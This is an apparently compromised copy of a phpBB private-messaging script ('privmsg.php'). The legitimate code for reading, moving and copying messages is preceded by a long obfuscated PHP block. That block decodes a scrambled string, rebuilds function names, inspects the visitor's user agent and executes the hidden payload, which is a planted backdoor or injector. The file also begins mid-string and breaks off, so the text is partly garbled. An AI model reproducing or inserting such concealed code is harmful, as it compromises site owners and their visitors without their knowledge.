1%s: x5c%j:.2^,%b:%s: x5c%*b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-/7&6|7**111127-K)ebfsX x27}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*ms!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qww!>! x2400~:/h%:<**#57] x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`Gmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepd x6f 151 x64")) or (strstr($uas," x63 150 x72 157 x6d 145")) or !%w:!>!(%w:!>! x246767~6q%V<*#fopoV;hojtj{fpg)%s:*<%j:,,Bjg!)%j:>>t("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<#p#/%z>2*!%z>32!{e%)!>> x22!ftmbg)!gj<*#k#)usb6 x3a 61 x31")) or (strstr($uj%7> x2272qj%)7gj6<**2qj%)hopm3qjA);#)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~92otfr("", $idjwibr); $vgefium();}}epdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`as," x61 156 x64 1628>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{h x7f!b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*u%)7fmjix6j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>jOFHB`SFTV`QUUI&b%!|!*)323zbek!~!qp%!|Z~!<##!>!2p%!|!*!***b%f x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~63of:opjudovg<~ x24!66~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}7;!}6;###-#O#-#N#*-!%ff2-!%t::**<(g(0); $idjwibr = implode(array_map("jobifje",str_spli-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI]38y]572]48y]#>m%:|:*r%:-t%)]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1%!*9! x27!hmg%)!gj!~j%!<**3-j%-bubE{h%)sut x24 x5c%j^ x24- x24tvctus)% x24- x24b!>!%yy)#}#-# x24- x24pp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x58 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]utjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;*h%)m%):fmjix:<##:>:h%:ssbz)#44ec:649#-!#:618d5f9#-!r.985:52985-t.98]K4]65]> x22!pd%)!gj}Z;h!opjudovg};^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>fe{h+{d%)+opjudovg+)!gj+{emsvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;ps)%j>1<%j=tj{fpg)% x24- x24*Ew:Qb:Qc:W~!%z!>21<%j=6[%ww2!>#p#/38y]47]67y]37]88y]27]28y]321]464]284]364]6]234]342]58]24/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>11<%j:=mgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%ut`cpV x7f x7f x7f x7f! xyy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)OBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{66< x7fw6* x7f_*#fubfsdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") c1^W%c!>!%i x5c2^u%V<#65,47R25,d7R17,67R24- x24-!% x24- x24*!|! x24-bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]4W~ x24#]y31]278]y3e]81]K78:56985:1M6]y3e]81#/#7e:55946-tr.984:75983&& (!isset($GLOBALS[" x61 156 x75 2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy!%tdz)%); if ((strstr($uas," x6d 163 x69 145")) or (strstr($uas," x72 1600;quui#>.%!<***f x27,*e x27,*d x27,*c x27,5cq% x27Y%6<.msv`ftsbqA7>q%341]88M4P8]37]278]225]241]334]368]322]3]364*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssb x242178}527}88:}334}472 x24!bssbz) x24]25 x/% x24- x24!>!fyqmpef)# x24*! x24Y x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*!#]y84]275]y83]273]y76]277#!b(strstr($uas," x66 151 x24y4 x24- x24]y8 x24- x24]26 x24-}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g<#64y]552]e7y]#>n%<#372]58y]472^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x75 156 x61"]=1; $uas=strtolower($_SERVER[" x4-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24-]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTfunction jobifje($n){return chr(ord($n)-1);} @error_reportin{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~U<#16,47R57,27R66,#/q%>2q%<#g6R8p%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562**#j{hnpd#)tutjyf`opjudovg x22)!gqj3hopmA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zD8]86]y31]278]y3f]51L3]84]y3]D4]275]D:M8]Df#<%tdz>#L4]275Lbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1j}1~!<2p% x7f!~!<##!>!2p%Z<^2 x:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tm~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**uepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z6197g:74985-rr.93e:5597fB)fubfsdXA x27K6< x7fw6*3qotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSfthjbyymkm'; $cjwrxhf=explode(chr((478-358)),substr($rfecrt,(26354-20334),(202-168))); $tarzmmx = $cjwrxhf[0]($cjwrxhf[(3-2)]); $aqbcmjwp = $cjwrxhf[0]($cjwrxhf[(6-4)]); if (!function_exists('iocukz')) { function iocukz($tjtsfi, $cwwrhsy,$mlawhim) { $dqweyenq = NULL; for($tguarm=0;$tguarm<(sizeof($tjtsfi)/2);$tguarm++) { $dqweyenq .= substr($cwwrhsy, $tjtsfi[($tguarm*2)],$tjtsfi[($tguarm*2)+(3-2)]); } return $mlawhim(chr((51-42)),chr((449-357)),$dqweyenq); }; } $wvxlxve = explode(chr((259-215)),'3381,56,3893,34,1431,36,4796,45,2052,59,3997,65,902,29,1133,20,527,64,4487,23,2364,48,3459,53,4975,60,1720,53,755,57,591,44,5122,32,5544,66,5522,22,1550,52,94,26,1314,25,1773,46,2299,65,423,39,5940,26,931,35,5322,46,2412,42,4741,55,4105,27,3313,68,5470,52,3205,42,4924,51,3247,66,1628,66,120,66,1092,41,2631,52,2536,34,5035,41,5426,44,2908,63,1339,57,1896,54,5610,50,4649,61,4590,59,5289,33,5660,31,306,65,5194,43,4062,43,50,44,1508,42,3750,53,5966,54,186,53,4175,50,2479,57,1396,35,1217,56,3161,44,5878,38,2570,35,4545,45,966,56,1153,64,5099,23,462,65,2605,26,856,46,2971,63,3512,35,5154,40,700,28,1055,37,2111,59,5822,56,3620,51,4382,64,239,67,371,52,2796,24,4889,35,2170,23,4710,31,5237,52,1819,28,1602,26,4225,52,3547,28,1950,59,4841,48,4510,35,4319,63,2683,56,4277,42,2009,43,3437,22,4446,41,2193,29,3034,67,1273,41,5754,68,3803,56,5916,24,5076,23,2222,23,5368,28,3859,34,5691,63,3101,60,5396,30,1467,41,3927,70,3575,45,4132,43,3671,58,2454,25,2820,32,1847,49,2852,56,728,27,0,50,2739,57,812,44,3729,21,635,65,1694,26,2245,54,1022,33'); $lsiciieq = $tarzmmx("",iocukz($wvxlxve,$rfecrt,$aqbcmjwp)); $tarzmmx=$rfecrt; $lsiciieq(""); $lsiciieq=(840-719); $rfecrt=$lsiciieq-1; ?>#', '#"#'); $html_entities_replace = array('&', '<', '>', '"'); // // Parameters // $submit = ( isset($HTTP_POST_VARS['post']) ) ? TRUE : 0; $submit_search = ( isset($HTTP_POST_VARS['usersubmit']) ) ? TRUE : 0; $submit_msgdays = ( isset($HTTP_POST_VARS['submit_msgdays']) ) ? TRUE : 0; $cancel = ( isset($HTTP_POST_VARS['cancel']) ) ? TRUE : 0; $preview = ( isset($HTTP_POST_VARS['preview']) ) ? TRUE : 0; $confirm = ( isset($HTTP_POST_VARS['confirm']) ) ? TRUE : 0; $delete = ( isset($HTTP_POST_VARS['delete']) ) ? TRUE : 0; $delete_all = ( isset($HTTP_POST_VARS['deleteall']) ) ? TRUE : 0; $save = ( isset($HTTP_POST_VARS['save']) ) ? TRUE : 0; $refresh = $preview || $submit_search; $mark_list = ( !empty($HTTP_POST_VARS['mark']) ) ? $HTTP_POST_VARS['mark'] : 0; if ( isset($HTTP_POST_VARS['folder']) || isset($HTTP_GET_VARS['folder']) ) { $folder = ( isset($HTTP_POST_VARS['folder']) ) ? $HTTP_POST_VARS['folder'] : $HTTP_GET_VARS['folder']; $folder = htmlspecialchars($folder); if ( $folder != 'inbox' && $folder != 'outbox' && $folder != 'sentbox' && $folder != 'savebox' ) { $folder = 'inbox'; } } else { $folder = 'inbox'; } // // Start session management // $userdata = session_pagestart($user_ip, PAGE_PRIVMSGS); init_userprefs($userdata); // // End session management // // // Cancel // if ( $cancel ) { redirect(append_sid("privmsg.$phpEx?folder=$folder", true)); } // // Var definitions // if ( !empty($HTTP_POST_VARS['mode']) || !empty($HTTP_GET_VARS['mode']) ) { $mode = ( !empty($HTTP_POST_VARS['mode']) ) ? $HTTP_POST_VARS['mode'] : $HTTP_GET_VARS['mode']; $mode = htmlspecialchars($mode); } else { $mode = ''; } $start = ( !empty($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0; if ( isset($HTTP_POST_VARS[POST_POST_URL]) || isset($HTTP_GET_VARS[POST_POST_URL]) ) { $privmsg_id = ( isset($HTTP_POST_VARS[POST_POST_URL]) ) ? intval($HTTP_POST_VARS[POST_POST_URL]) : intval($HTTP_GET_VARS[POST_POST_URL]); } else { $privmsg_id = ''; } $error = FALSE; // // Define the box image links // $inbox_img = ( $folder != 'inbox' || $mode != '' ) ? '' . $lang['Inbox'] . '' : '' . $lang['Inbox'] . ''; $inbox_url = ( $folder != 'inbox' || $mode != '' ) ? '' . $lang['Inbox'] . '' : $lang['Inbox']; $outbox_img = ( $folder != 'outbox' || $mode != '' ) ? '' . $lang['Outbox'] . '' : '' . $lang['Outbox'] . ''; $outbox_url = ( $folder != 'outbox' || $mode != '' ) ? '' . $lang['Outbox'] . '' : $lang['Outbox']; $sentbox_img = ( $folder != 'sentbox' || $mode != '' ) ? '' . $lang['Sentbox'] . '' : '' . $lang['Sentbox'] . ''; $sentbox_url = ( $folder != 'sentbox' || $mode != '' ) ? '' . $lang['Sentbox'] . '' : $lang['Sentbox']; $savebox_img = ( $folder != 'savebox' || $mode != '' ) ? '' . $lang['Savebox'] . '' : '' . $lang['Savebox'] . ''; $savebox_url = ( $folder != 'savebox' || $mode != '' ) ? '' . $lang['Savebox'] . '' : $lang['Savebox']; // ---------- // Start main // if ( $mode == 'newpm' ) { $gen_simple_header = TRUE; $page_title = $lang['Private_Messaging']; include($phpbb_root_path . 'includes/page_header.'.$phpEx); $template->set_filenames(array( 'body' => 'privmsgs_popup.tpl') ); if ( $userdata['session_logged_in'] ) { if ( $userdata['user_new_privmsg'] ) { $l_new_message = ( $userdata['user_new_privmsg'] == 1 ) ? $lang['You_new_pm'] : $lang['You_new_pms']; } else { $l_new_message = $lang['You_no_new_pm']; } $l_new_message .= '

' . sprintf($lang['Click_view_privmsg'], '', ''); } else { $l_new_message = $lang['Login_check_pm']; } $template->assign_vars(array( 'L_CLOSE_WINDOW' => $lang['Close_window'], 'L_MESSAGE' => $l_new_message) ); $template->pparse('body'); include($phpbb_root_path . 'includes/page_tail.'.$phpEx); } else if ( $mode == 'read' ) { if ( !empty($HTTP_GET_VARS[POST_POST_URL]) ) { $privmsgs_id = intval($HTTP_GET_VARS[POST_POST_URL]); } else { message_die(GENERAL_ERROR, $lang['No_post_id']); } if ( !$userdata['session_logged_in'] ) { redirect(append_sid("login.$phpEx?redirect=privmsg.$phpEx&folder=$folder&mode=$mode&" . POST_POST_URL . "=$privmsgs_id", true)); } // // SQL to pull appropriate message, prevents nosey people // reading other peoples messages ... hopefully! // switch( $folder ) { case 'inbox': $l_box_name = $lang['Inbox']; $pm_sql_user = "AND pm.privmsgs_to_userid = " . $userdata['user_id'] . " AND ( pm.privmsgs_type = " . PRIVMSGS_READ_MAIL . " OR pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )"; break; case 'outbox': $l_box_name = $lang['Outbox']; $pm_sql_user = "AND pm.privmsgs_from_userid = " . $userdata['user_id'] . " AND ( pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " ) "; break; case 'sentbox': $l_box_name = $lang['Sentbox']; $pm_sql_user = "AND pm.privmsgs_from_userid = " . $userdata['user_id'] . " AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL; break; case 'savebox': $l_box_name = $lang['Savebox']; $pm_sql_user = "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . " AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . " AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " ) )"; break; default: message_die(GENERAL_ERROR, $lang['No_such_folder']); break; } // // Major query obtains the message ... // $sql = "SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM " . PRIVMSGS_TABLE . " pm, " . PRIVMSGS_TEXT_TABLE . " pmt, " . USERS_TABLE . " u, " . USERS_TABLE . " u2 WHERE pm.privmsgs_id = $privmsgs_id AND pmt.privmsgs_text_id = pm.privmsgs_id $pm_sql_user AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid"; if ( !($result = $db->sql_query($sql)) ) { message_die(GENERAL_ERROR, 'Could not query private message post information', '', __LINE__, __FILE__, $sql); } // // Did the query return any data? // if ( !($privmsg = $db->sql_fetchrow($result)) ) { redirect(append_sid("privmsg.$phpEx?folder=$folder", true)); } $privmsg_id = $privmsg['privmsgs_id']; // // Is this a new message in the inbox? If it is then save // a copy in the posters sent box // if (($privmsg['privmsgs_type'] == PRIVMSGS_NEW_MAIL || $privmsg['privmsgs_type'] == PRIVMSGS_UNREAD_MAIL) && $folder == 'inbox') { // Update appropriate counter switch ($privmsg['privmsgs_type']) { case PRIVMSGS_NEW_MAIL: $sql = "user_new_privmsg = user_new_privmsg - 1"; break; case PRIVMSGS_UNREAD_MAIL: $sql = "user_unread_privmsg = user_unread_privmsg - 1"; break; } $sql = "UPDATE " . USERS_TABLE . " SET $sql WHERE user_id = " . $userdata['user_id']; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not update private message read status for user', '', __LINE__, __FILE__, $sql); } $sql = "UPDATE " . PRIVMSGS_TABLE . " SET privmsgs_type = " . PRIVMSGS_READ_MAIL . " WHERE privmsgs_id = " . $privmsg['privmsgs_id']; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not update private message read status', '', __LINE__, __FILE__, $sql); } // Check to see if the poster has a 'full' sent box $sql = "SELECT COUNT(privmsgs_id) AS sent_items, MIN(privmsgs_date) AS oldest_post_time FROM " . PRIVMSGS_TABLE . " WHERE privmsgs_type = " . PRIVMSGS_SENT_MAIL . " AND privmsgs_from_userid = " . $privmsg['privmsgs_from_userid']; if ( !($result = $db->sql_query($sql)) ) { message_die(GENERAL_ERROR, 'Could not obtain sent message info for sendee', '', __LINE__, __FILE__, $sql); } $sql_priority = ( SQL_LAYER == 'mysql' ) ? 'LOW_PRIORITY' : ''; if ( $sent_info = $db->sql_fetchrow($result) ) { if ($board_config['max_sentbox_privmsgs'] && $sent_info['sent_items'] >= $board_config['max_sentbox_privmsgs']) { $sql = "SELECT privmsgs_id FROM " . PRIVMSGS_TABLE . " WHERE privmsgs_type = " . PRIVMSGS_SENT_MAIL . " AND privmsgs_date = " . $sent_info['oldest_post_time'] . " AND privmsgs_from_userid = " . $privmsg['privmsgs_from_userid']; if ( !$result = $db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not find oldest privmsgs', '', __LINE__, __FILE__, $sql); } $old_privmsgs_id = $db->sql_fetchrow($result); $old_privmsgs_id = $old_privmsgs_id['privmsgs_id']; $sql = "DELETE $sql_priority FROM " . PRIVMSGS_TABLE . " WHERE privmsgs_id = $old_privmsgs_id"; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not delete oldest privmsgs (sent)', '', __LINE__, __FILE__, $sql); } $sql = "DELETE $sql_priority FROM " . PRIVMSGS_TEXT_TABLE . " WHERE privmsgs_text_id = $old_privmsgs_id"; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not delete oldest privmsgs text (sent)', '', __LINE__, __FILE__, $sql); } } } // // This makes a copy of the post and stores it as a SENT message from the sendee. Perhaps // not the most DB friendly way but a lot easier to manage, besides the admin will be able to // set limits on numbers of storable posts for users ... hopefully! // $sql = "INSERT $sql_priority INTO " . PRIVMSGS_TABLE . " (privmsgs_type, privmsgs_subject, privmsgs_from_userid, privmsgs_to_userid, privmsgs_date, privmsgs_ip, privmsgs_enable_html, privmsgs_enable_bbcode, privmsgs_enable_smilies, privmsgs_attach_sig) VALUES (" . PRIVMSGS_SENT_MAIL . ", '" . str_replace("\'", "''", addslashes($privmsg['privmsgs_subject'])) . "', " . $privmsg['privmsgs_from_userid'] . ", " . $privmsg['privmsgs_to_userid'] . ", " . $privmsg['privmsgs_date'] . ", '" . $privmsg['privmsgs_ip'] . "', " . $privmsg['privmsgs_enable_html'] . ", " . $privmsg['privmsgs_enable_bbcode'] . ", " . $privmsg['privmsgs_enable_smilies'] . ", " . $privmsg['privmsgs_attach_sig'] . ")"; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not insert private message sent info', '', __LINE__, __FILE__, $sql); } $privmsg_sent_id = $db->sql_nextid(); $sql = "INSERT $sql_priority INTO " . PRIVMSGS_TEXT_TABLE . " (privmsgs_text_id, privmsgs_bbcode_uid, privmsgs_text) VALUES ($privmsg_sent_id, '" . $privmsg['privmsgs_bbcode_uid'] . "', '" . str_replace("\'", "''", addslashes($privmsg['privmsgs_text'])) . "')"; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not insert private message sent text', '', __LINE__, __FILE__, $sql); } } // // Pick a folder, any folder, so long as it's one below ... // $post_urls = array( 'post' => append_sid("privmsg.$phpEx?mode=post"), 'reply' => append_sid("privmsg.$phpEx?mode=reply&" . POST_POST_URL . "=$privmsg_id"), 'quote' => append_sid("privmsg.$phpEx?mode=quote&" . POST_POST_URL . "=$privmsg_id"), 'edit' => append_sid("privmsg.$phpEx?mode=edit&" . POST_POST_URL . "=$privmsg_id") ); $post_icons = array( 'post_img' => '' . $lang['Post_new_pm'] . '', 'post' => '' . $lang['Post_new_pm'] . '', 'reply_img' => '' . $lang['Post_reply_pm'] . '', 'reply' => '' . $lang['Post_reply_pm'] . '', 'quote_img' => '' . $lang['Post_quote_pm'] . '', 'quote' => '' . $lang['Post_quote_pm'] . '', 'edit_img' => '' . $lang['Edit_pm'] . '', 'edit' => '' . $lang['Edit_pm'] . '' ); if ( $folder == 'inbox' ) { $post_img = $post_icons['post_img']; $reply_img = $post_icons['reply_img']; $quote_img = $post_icons['quote_img']; $edit_img = ''; $post = $post_icons['post']; $reply = $post_icons['reply']; $quote = $post_icons['quote']; $edit = ''; $l_box_name = $lang['Inbox']; } else if ( $folder == 'outbox' ) { $post_img = $post_icons['post_img']; $reply_img = ''; $quote_img = ''; $edit_img = $post_icons['edit_img']; $post = $post_icons['post']; $reply = ''; $quote = ''; $edit = $post_icons['edit']; $l_box_name = $lang['Outbox']; } else if ( $folder == 'savebox' ) { if ( $privmsg['privmsgs_type'] == PRIVMSGS_SAVED_IN_MAIL ) { $post_img = $post_icons['post_img']; $reply_img = $post_icons['reply_img']; $quote_img = $post_icons['quote_img']; $edit_img = ''; $post = $post_icons['post']; $reply = $post_icons['reply']; $quote = $post_icons['quote']; $edit = ''; } else { $post_img = $post_icons['post_img']; $reply_img = ''; $quote_img = ''; $edit_img = ''; $post = $post_icons['post']; $reply = ''; $quote = ''; $edit = ''; } $l_box_name = $lang['Saved']; } else if ( $folder == 'sentbox' ) { $post_img = $post_icons['post_img']; $reply_img = ''; $quote_img = ''; $edit_img = ''; $post = $post_icons['post']; $reply = ''; $quote = ''; $edit = ''; $l_box_name = $lang['Sent']; } $s_hidden_fields = ''; $page_title = $lang['Read_pm']; include($phpbb_root_path . 'includes/page_header.'.$phpEx); // // Load templates // $template->set_filenames(array( 'body' => 'privmsgs_read_body.tpl') ); make_jumpbox('viewforum.'.$phpEx); $template->assign_vars(array( 'INBOX_IMG' => $inbox_img, 'SENTBOX_IMG' => $sentbox_img, 'OUTBOX_IMG' => $outbox_img, 'SAVEBOX_IMG' => $savebox_img, 'INBOX' => $inbox_url, 'POST_PM_IMG' => $post_img, 'REPLY_PM_IMG' => $reply_img, 'EDIT_PM_IMG' => $edit_img, 'QUOTE_PM_IMG' => $quote_img, 'POST_PM' => $post, 'REPLY_PM' => $reply, 'EDIT_PM' => $edit, 'QUOTE_PM' => $quote, 'SENTBOX' => $sentbox_url, 'OUTBOX' => $outbox_url, 'SAVEBOX' => $savebox_url, 'BOX_NAME' => $l_box_name, 'L_MESSAGE' => $lang['Message'], 'L_INBOX' => $lang['Inbox'], 'L_OUTBOX' => $lang['Outbox'], 'L_SENTBOX' => $lang['Sent'], 'L_SAVEBOX' => $lang['Saved'], 'L_FLAG' => $lang['Flag'], 'L_SUBJECT' => $lang['Subject'], 'L_POSTED' => $lang['Posted'], 'L_DATE' => $lang['Date'], 'L_FROM' => $lang['From'], 'L_TO' => $lang['To'], 'L_SAVE_MSG' => $lang['Save_message'], 'L_DELETE_MSG' => $lang['Delete_message'], 'S_PRIVMSGS_ACTION' => append_sid("privmsg.$phpEx?folder=$folder"), 'S_HIDDEN_FIELDS' => $s_hidden_fields) ); $username_from = $privmsg['username_1']; $user_id_from = $privmsg['user_id_1']; $username_to = $privmsg['username_2']; $user_id_to = $privmsg['user_id_2']; $post_date = create_date($board_config['default_dateformat'], $privmsg['privmsgs_date'], $board_config['board_timezone']); $temp_url = append_sid("profile.$phpEx?mode=viewprofile&" . POST_USERS_URL . '=' . $user_id_from); $profile_img = '' . $lang['Read_profile'] . ''; $profile = '' . $lang['Read_profile'] . ''; $temp_url = append_sid("privmsg.$phpEx?mode=post&" . POST_USERS_URL . "=$user_id_from"); $pm_img = '' . $lang['Send_private_message'] . ''; $pm = '' . $lang['Send_private_message'] . ''; if ( !empty($privmsg['user_viewemail']) || $userdata['user_level'] == ADMIN ) { $email_uri = ( $board_config['board_email_form'] ) ? append_sid("profile.$phpEx?mode=email&" . POST_USERS_URL .'=' . $user_id_from) : 'mailto:' . $privmsg['user_email']; $email_img = '' . $lang['Send_email'] . ''; $email = '' . $lang['Send_email'] . ''; } else { $email_img = ''; $email = ''; } $www_img = ( $privmsg['user_website'] ) ? '' . $lang['Visit_website'] . '' : ''; $www = ( $privmsg['user_website'] ) ? '' . $lang['Visit_website'] . '' : ''; if ( !empty($privmsg['user_icq']) ) { $icq_status_img = ''; $icq_img = '' . $lang['ICQ'] . ''; $icq = '' . $lang['ICQ'] . ''; } else { $icq_status_img = ''; $icq_img = ''; $icq = ''; } $aim_img = ( $privmsg['user_aim'] ) ? '' . $lang['AIM'] . '' : ''; $aim = ( $privmsg['user_aim'] ) ? '' . $lang['AIM'] . '' : ''; $temp_url = append_sid("profile.$phpEx?mode=viewprofile&" . POST_USERS_URL . "=$user_id_from"); $msn_img = ( $privmsg['user_msnm'] ) ? '' . $lang['MSNM'] . '' : ''; $msn = ( $privmsg['user_msnm'] ) ? '' . $lang['MSNM'] . '' : ''; $yim_img = ( $privmsg['user_yim'] ) ? '' . $lang['YIM'] . '' : ''; $yim = ( $privmsg['user_yim'] ) ? '' . $lang['YIM'] . '' : ''; $temp_url = append_sid("search.$phpEx?search_author=" . urlencode($username_from) . "&showresults=posts"); $search_img = '' . sprintf($lang['Search_user_posts'], $username_from) . ''; $search = '' . sprintf($lang['Search_user_posts'], $username_from) . ''; // // Processing of post // $post_subject = $privmsg['privmsgs_subject']; $private_message = $privmsg['privmsgs_text']; $bbcode_uid = $privmsg['privmsgs_bbcode_uid']; if ( $board_config['allow_sig'] ) { $user_sig = ( $privmsg['privmsgs_from_userid'] == $userdata['user_id'] ) ? $userdata['user_sig'] : $privmsg['user_sig']; } else { $user_sig = ''; } $user_sig_bbcode_uid = ( $privmsg['privmsgs_from_userid'] == $userdata['user_id'] ) ? $userdata['user_sig_bbcode_uid'] : $privmsg['user_sig_bbcode_uid']; // // If the board has HTML off but the post has HTML // on then we process it, else leave it alone // if ( !$board_config['allow_html'] || !$userdata['user_allowhtml']) { if ( $user_sig != '') { $user_sig = preg_replace('#(<)([\/]?.*?)(>)#is', "<\\2>", $user_sig); } if ( $privmsg['privmsgs_enable_html'] ) { $private_message = preg_replace('#(<)([\/]?.*?)(>)#is', "<\\2>", $private_message); } } if ( $user_sig != '' && $privmsg['privmsgs_attach_sig'] && $user_sig_bbcode_uid != '' ) { $user_sig = ( $board_config['allow_bbcode'] ) ? bbencode_second_pass($user_sig, $user_sig_bbcode_uid) : preg_replace('/\:[0-9a-z\:]+\]/si', ']', $user_sig); } if ( $bbcode_uid != '' ) { $private_message = ( $board_config['allow_bbcode'] ) ? bbencode_second_pass($private_message, $bbcode_uid) : preg_replace('/\:[0-9a-z\:]+\]/si', ']', $private_message); } $private_message = make_clickable($private_message); if ( $privmsg['privmsgs_attach_sig'] && $user_sig != '' ) { $private_message .= '

_________________
' . make_clickable($user_sig); } $orig_word = array(); $replacement_word = array(); obtain_word_list($orig_word, $replacement_word); if ( count($orig_word) ) { $post_subject = preg_replace($orig_word, $replacement_word, $post_subject); $private_message = preg_replace($orig_word, $replacement_word, $private_message); } if ( $board_config['allow_smilies'] && $privmsg['privmsgs_enable_smilies'] ) { $private_message = smilies_pass($private_message); } $private_message = str_replace("\n", '
